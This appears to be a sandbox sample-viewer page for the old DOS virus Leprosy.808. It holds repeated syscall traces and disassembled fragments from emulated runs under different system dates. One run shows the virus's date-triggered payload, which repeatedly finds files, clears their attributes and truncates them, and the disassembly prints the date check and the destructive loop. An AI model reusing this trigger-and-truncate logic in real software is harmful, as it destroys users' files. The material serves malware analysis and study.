Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.808.m

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:27:05.093237012Z 48 PC: 12b3f | Get DOS version
2018-12-17T22:27:05.094913532Z 44 PC: 12b47 | Get time 0x12b47: mov byte ptr [0x103], dl
0x12b4b: mov dx, 0x14e
0x12b4e: mov ah, 0x1a
0x12b50: int 0x21
0x12b52: mov ah, 0x19
0x12b54: int 0x21
0x12b56: mov dl, al
0x12b58: inc dl
0x12b5a: mov ah, 0x47
0x12b5c: mov si, 0x1ad
0x12b5f: int 0x21
0x12b61: mov dx, 0x14c
0x12b64: mov ah, 0x3b
0x12b66: int 0x21
0x12b68: mov cx, 0x13
0x12b6b: mov dx, 0x144
0x12b6e: mov ah, 0x4e
0x12b70: int 0x21
0x12b72: cmp ax, 0x12
0x12b75: jne 0x12b7a
2018-12-17T22:27:05.097245303Z 26 PC: 12b52 | Set disk transfer address
2018-12-17T22:27:05.098611304Z 25 PC: 12b56 | Get default drive
2018-12-17T22:27:05.10039602Z 71 PC: 12b61 | Get current directory
2018-12-17T22:27:05.103241916Z 59 PC: 12b68 | Change current directory
2018-12-17T22:27:05.106933323Z 78 PC: 12b72 | Find first file
2018-12-17T22:27:05.112507651Z 87 PC: 12c56 | Get or set file date and time
2018-12-17T22:27:05.114282178Z 67 PC: 12c62 | Get or set file attributes
2018-12-17T22:27:05.11587533Z 59 PC: 12c69 | Change current directory
2018-12-17T22:27:05.119576202Z 59 PC: 12c70 | Change current directory
2018-12-17T22:27:05.121440425Z 42 PC: 12c74 | Get date 0x12c74: cmp cx, 0x7c7
0x12c78: jb 0x12caa
0x12c7a: cmp dl, 0x19
0x12c7d: jb 0x12caa
0x12c7f: cmp al, 5
0x12c81: jne 0x12caa
0x12c83: mov dx, 0x14e
0x12c86: mov ah, 0x1a
0x12c88: int 0x21
0x12c8a: mov ah, 0x4e
0x12c8c: mov cx, 7
0x12c8f: mov dx, 0x140
0x12c92: int 0x21
0x12c94: jb 0x12caa
0x12c96: mov ax, 0x4301
0x12c99: xor cx, cx
0x12c9b: int 0x21
0x12c9d: mov dx, 0x16c
0x12ca0: mov ah, 0x3c
0x12ca2: int 0x21
2018-12-17T22:27:05.123471732Z 76 PC: 12caf | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4805,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:55.965941593Z 48 PC: 12b3f | Get DOS version
2018-12-25T11:52:55.96779121Z 44 PC: 12b47 | Get time 0x12b47: mov byte ptr [0x103], dl
0x12b4b: mov dx, 0x14e
0x12b4e: mov ah, 0x1a
0x12b50: int 0x21
0x12b52: mov ah, 0x19
0x12b54: int 0x21
0x12b56: mov dl, al
0x12b58: inc dl
0x12b5a: mov ah, 0x47
0x12b5c: mov si, 0x1ad
0x12b5f: int 0x21
0x12b61: mov dx, 0x14c
0x12b64: mov ah, 0x3b
0x12b66: int 0x21
0x12b68: mov cx, 0x13
0x12b6b: mov dx, 0x144
0x12b6e: mov ah, 0x4e
0x12b70: int 0x21
0x12b72: cmp ax, 0x12
0x12b75: jne 0x12b7a
2018-12-25T11:52:55.969759733Z 26 PC: 12b52 | Set disk transfer address
2018-12-25T11:52:55.970717811Z 25 PC: 12b56 | Get default drive
2018-12-25T11:52:55.972404439Z 71 PC: 12b61 | Get current directory
2018-12-25T11:52:55.97515665Z 59 PC: 12b68 | Change current directory
2018-12-25T11:52:55.978874153Z 78 PC: 12b72 | Find first file
2018-12-25T11:52:55.985359164Z 87 PC: 12c56 | Get or set file date and time
2018-12-25T11:52:55.986840948Z 67 PC: 12c62 | Get or set file attributes
2018-12-25T11:52:55.988525511Z 59 PC: 12c69 | Change current directory
2018-12-25T11:52:55.993147026Z 59 PC: 12c70 | Change current directory
2018-12-25T11:52:55.994898385Z 42 PC: 12c74 | Get date 0x12c74: cmp cx, 0x7c7
0x12c78: jb 0x12caa
0x12c7a: cmp dl, 0x19
0x12c7d: jb 0x12caa
0x12c7f: cmp al, 5
0x12c81: jne 0x12caa
0x12c83: mov dx, 0x14e
0x12c86: mov ah, 0x1a
0x12c88: int 0x21
0x12c8a: mov ah, 0x4e
0x12c8c: mov cx, 7
0x12c8f: mov dx, 0x140
0x12c92: int 0x21
0x12c94: jb 0x12caa
0x12c96: mov ax, 0x4301
0x12c99: xor cx, cx
0x12c9b: int 0x21
0x12c9d: mov dx, 0x16c
0x12ca0: mov ah, 0x3c
0x12ca2: int 0x21
2018-12-25T11:52:55.99694079Z 76 PC: 12caf | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4805,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:56.150555873Z 48 PC: 12b3f | Get DOS version
2018-12-25T11:52:56.1526974Z 44 PC: 12b47 | Get time 0x12b47: mov byte ptr [0x103], dl
0x12b4b: mov dx, 0x14e
0x12b4e: mov ah, 0x1a
0x12b50: int 0x21
0x12b52: mov ah, 0x19
0x12b54: int 0x21
0x12b56: mov dl, al
0x12b58: inc dl
0x12b5a: mov ah, 0x47
0x12b5c: mov si, 0x1ad
0x12b5f: int 0x21
0x12b61: mov dx, 0x14c
0x12b64: mov ah, 0x3b
0x12b66: int 0x21
0x12b68: mov cx, 0x13
0x12b6b: mov dx, 0x144
0x12b6e: mov ah, 0x4e
0x12b70: int 0x21
0x12b72: cmp ax, 0x12
0x12b75: jne 0x12b7a
2018-12-25T11:52:56.155924519Z 26 PC: 12b52 | Set disk transfer address
2018-12-25T11:52:56.1571652Z 25 PC: 12b56 | Get default drive
2018-12-25T11:52:56.168019565Z 71 PC: 12b61 | Get current directory
2018-12-25T11:52:56.171196344Z 59 PC: 12b68 | Change current directory
2018-12-25T11:52:56.176647698Z 78 PC: 12b72 | Find first file
2018-12-25T11:52:56.189247124Z 87 PC: 12c56 | Get or set file date and time
2018-12-25T11:52:56.19156469Z 67 PC: 12c62 | Get or set file attributes
2018-12-25T11:52:56.193721683Z 59 PC: 12c69 | Change current directory
2018-12-25T11:52:56.199797811Z 59 PC: 12c70 | Change current directory
2018-12-25T11:52:56.202886287Z 42 PC: 12c74 | Get date 0x12c74: cmp cx, 0x7c7
0x12c78: jb 0x12caa
0x12c7a: cmp dl, 0x19
0x12c7d: jb 0x12caa
0x12c7f: cmp al, 5
0x12c81: jne 0x12caa
0x12c83: mov dx, 0x14e
0x12c86: mov ah, 0x1a
0x12c88: int 0x21
0x12c8a: mov ah, 0x4e
0x12c8c: mov cx, 7
0x12c8f: mov dx, 0x140
0x12c92: int 0x21
0x12c94: jb 0x12caa
0x12c96: mov ax, 0x4301
0x12c99: xor cx, cx
0x12c9b: int 0x21
0x12c9d: mov dx, 0x16c
0x12ca0: mov ah, 0x3c
0x12ca2: int 0x21
2018-12-25T11:52:56.206053921Z 76 PC: 12caf | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":25,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4805,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:56.397779196Z 48 PC: 12b3f | Get DOS version
2018-12-25T11:52:56.399726487Z 44 PC: 12b47 | Get time 0x12b47: mov byte ptr [0x103], dl
0x12b4b: mov dx, 0x14e
0x12b4e: mov ah, 0x1a
0x12b50: int 0x21
0x12b52: mov ah, 0x19
0x12b54: int 0x21
0x12b56: mov dl, al
0x12b58: inc dl
0x12b5a: mov ah, 0x47
0x12b5c: mov si, 0x1ad
0x12b5f: int 0x21
0x12b61: mov dx, 0x14c
0x12b64: mov ah, 0x3b
0x12b66: int 0x21
0x12b68: mov cx, 0x13
0x12b6b: mov dx, 0x144
0x12b6e: mov ah, 0x4e
0x12b70: int 0x21
0x12b72: cmp ax, 0x12
0x12b75: jne 0x12b7a
2018-12-25T11:52:56.40365665Z 26 PC: 12b52 | Set disk transfer address
2018-12-25T11:52:56.405911856Z 25 PC: 12b56 | Get default drive
2018-12-25T11:52:56.409307802Z 71 PC: 12b61 | Get current directory
2018-12-25T11:52:56.412414963Z 59 PC: 12b68 | Change current directory
2018-12-25T11:52:56.417434646Z 78 PC: 12b72 | Find first file
2018-12-25T11:52:56.431041204Z 87 PC: 12c56 | Get or set file date and time
2018-12-25T11:52:56.434214899Z 67 PC: 12c62 | Get or set file attributes
2018-12-25T11:52:56.436472406Z 59 PC: 12c69 | Change current directory
2018-12-25T11:52:56.441114524Z 59 PC: 12c70 | Change current directory
2018-12-25T11:52:56.444345402Z 42 PC: 12c74 | Get date 0x12c74: cmp cx, 0x7c7
0x12c78: jb 0x12caa
0x12c7a: cmp dl, 0x19
0x12c7d: jb 0x12caa
0x12c7f: cmp al, 5
0x12c81: jne 0x12caa
0x12c83: mov dx, 0x14e
0x12c86: mov ah, 0x1a
0x12c88: int 0x21
0x12c8a: mov ah, 0x4e
0x12c8c: mov cx, 7
0x12c8f: mov dx, 0x140
0x12c92: int 0x21
0x12c94: jb 0x12caa
0x12c96: mov ax, 0x4301
0x12c99: xor cx, cx
0x12c9b: int 0x21
0x12c9d: mov dx, 0x16c
0x12ca0: mov ah, 0x3c
0x12ca2: int 0x21
2018-12-25T11:52:56.446706922Z 26 PC: 12c8a | Set disk transfer address
2018-12-25T11:52:56.447897483Z 78 PC: 12c94 | Find first file
2018-12-25T11:52:56.470282978Z 67 PC: 12c9d | Get or set file attributes
2018-12-25T11:52:56.475279499Z 60 PC: 12ca4 | Create or truncate file
2018-12-25T11:52:56.504716235Z 79 PC: 12c94 | Find next file (See above)
2018-12-25T11:52:56.508563597Z 67 PC: 12c9d | Get or set file attributes (See above)
2018-12-25T11:52:56.528518771Z 60 PC: 12ca4 | Create or truncate file (See above)
2018-12-25T11:52:56.550946031Z 79 PC: 12c94 | Find next file (See above)
2018-12-25T11:52:56.554380284Z 67 PC: 12c9d | Get or set file attributes (See above)
2018-12-25T11:52:56.565392449Z 60 PC: 12ca4 | Create or truncate file (See above)
2018-12-25T11:52:56.583102871Z 79 PC: 12c94 | Find next file (See above)
2018-12-25T11:52:56.587428633Z 67 PC: 12c9d | Get or set file attributes (See above)
2018-12-25T11:52:56.600494425Z 60 PC: 12ca4 | Create or truncate file (See above)
2018-12-25T11:52:56.615060187Z 79 PC: 12c94 | Find next file (See above)
2018-12-25T11:52:56.618801578Z 67 PC: 12c9d | Get or set file attributes (See above)
2018-12-25T11:52:56.630941199Z 60 PC: 12ca4 | Create or truncate file (See above)
2018-12-25T11:52:56.645714512Z 79 PC: 12c94 | Find next file (See above)
2018-12-25T11:52:56.651086771Z 67 PC: 12c9d | Get or set file attributes (See above)
2018-12-25T11:52:56.663651362Z 60 PC: 12ca4 | Create or truncate file (See above)
2018-12-25T11:52:56.677523599Z 79 PC: 12c94 | Find next file (See above)
2018-12-25T11:52:56.680810669Z 67 PC: 12c9d | Get or set file attributes (See above)
2018-12-25T11:52:56.693393121Z 60 PC: 12ca4 | Create or truncate file (See above)
2018-12-25T11:52:56.706996649Z 79 PC: 12c94 | Find next file (See above)
2018-12-25T11:52:56.709980279Z 67 PC: 12c9d | Get or set file attributes (See above)
2018-12-25T11:52:56.721595766Z 60 PC: 12ca4 | Create or truncate file (See above)
2018-12-25T11:52:56.735362103Z 79 PC: 12c94 | Find next file (See above)
2018-12-25T11:52:56.738569993Z 67 PC: 12c9d | Get or set file attributes (See above)
2018-12-25T11:52:56.750101388Z 60 PC: 12ca4 | Create or truncate file (See above)
2018-12-25T11:52:56.764344907Z 79 PC: 12c94 | Find next file (See above)
2018-12-25T11:52:56.767640138Z 76 PC: 12caf | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":26,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4805,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:56.402242046Z 48 PC: 12b3f | Get DOS version
2018-12-25T11:52:56.404504508Z 44 PC: 12b47 | Get time 0x12b47: mov byte ptr [0x103], dl
0x12b4b: mov dx, 0x14e
0x12b4e: mov ah, 0x1a
0x12b50: int 0x21
0x12b52: mov ah, 0x19
0x12b54: int 0x21
0x12b56: mov dl, al
0x12b58: inc dl
0x12b5a: mov ah, 0x47
0x12b5c: mov si, 0x1ad
0x12b5f: int 0x21
0x12b61: mov dx, 0x14c
0x12b64: mov ah, 0x3b
0x12b66: int 0x21
0x12b68: mov cx, 0x13
0x12b6b: mov dx, 0x144
0x12b6e: mov ah, 0x4e
0x12b70: int 0x21
0x12b72: cmp ax, 0x12
0x12b75: jne 0x12b7a
2018-12-25T11:52:56.407470851Z 26 PC: 12b52 | Set disk transfer address
2018-12-25T11:52:56.408845343Z 25 PC: 12b56 | Get default drive
2018-12-25T11:52:56.411202328Z 71 PC: 12b61 | Get current directory
2018-12-25T11:52:56.415513244Z 59 PC: 12b68 | Change current directory
2018-12-25T11:52:56.420276059Z 78 PC: 12b72 | Find first file
2018-12-25T11:52:56.424735831Z 87 PC: 12c56 | Get or set file date and time
2018-12-25T11:52:56.426374028Z 67 PC: 12c62 | Get or set file attributes
2018-12-25T11:52:56.427814671Z 59 PC: 12c69 | Change current directory
2018-12-25T11:52:56.430549394Z 59 PC: 12c70 | Change current directory
2018-12-25T11:52:56.440451384Z 42 PC: 12c74 | Get date 0x12c74: cmp cx, 0x7c7
0x12c78: jb 0x12caa
0x12c7a: cmp dl, 0x19
0x12c7d: jb 0x12caa
0x12c7f: cmp al, 5
0x12c81: jne 0x12caa
0x12c83: mov dx, 0x14e
0x12c86: mov ah, 0x1a
0x12c88: int 0x21
0x12c8a: mov ah, 0x4e
0x12c8c: mov cx, 7
0x12c8f: mov dx, 0x140
0x12c92: int 0x21
0x12c94: jb 0x12caa
0x12c96: mov ax, 0x4301
0x12c99: xor cx, cx
0x12c9b: int 0x21
0x12c9d: mov dx, 0x16c
0x12ca0: mov ah, 0x3c
0x12ca2: int 0x21
2018-12-25T11:52:56.442245424Z 76 PC: 12caf | Terminate with return code (Return code = '0')